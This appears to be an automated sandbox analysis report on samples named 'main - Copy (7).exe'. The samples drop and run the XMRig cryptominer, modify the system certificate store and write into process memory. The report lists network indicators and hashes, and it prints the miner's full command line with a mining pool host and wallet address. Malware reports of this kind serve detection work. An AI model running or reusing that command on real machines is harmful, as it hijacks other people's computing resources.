| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3836 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3836 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.57:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.61.62.23.in-addr.arpa | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2392-16-0x000002267E810000-0x000002267E830000-memory.dmp
memory/2392-17-0x000002267E860000-0x000002267E880000-memory.dmp
memory/2392-18-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-19-0x000002267E8A0000-0x000002267E8C0000-memory.dmp
memory/2392-20-0x000002267E880000-0x000002267E8A0000-memory.dmp
memory/2392-21-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-22-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-23-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-24-0x000002267E8A0000-0x000002267E8C0000-memory.dmp
memory/2392-25-0x000002267E880000-0x000002267E8A0000-memory.dmp
memory/2392-26-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-27-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-28-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-29-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-30-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-31-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-32-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-33-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-34-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-35-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-36-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-37-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-38-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-39-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-40-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-41-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-42-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-43-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-44-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-45-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-46-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-47-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-48-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-49-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-50-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-51-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-52-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-53-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-54-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-55-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-56-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-57-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-58-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-59-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-60-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-61-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-62-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-63-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-64-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-65-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-66-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-67-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-68-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-69-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-70-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-71-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-72-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-73-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-74-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-75-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-76-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-77-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-78-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-79-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-80-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-81-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-82-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-83-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-84-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2100 wrote to memory of 2108 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2100 wrote to memory of 2108 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
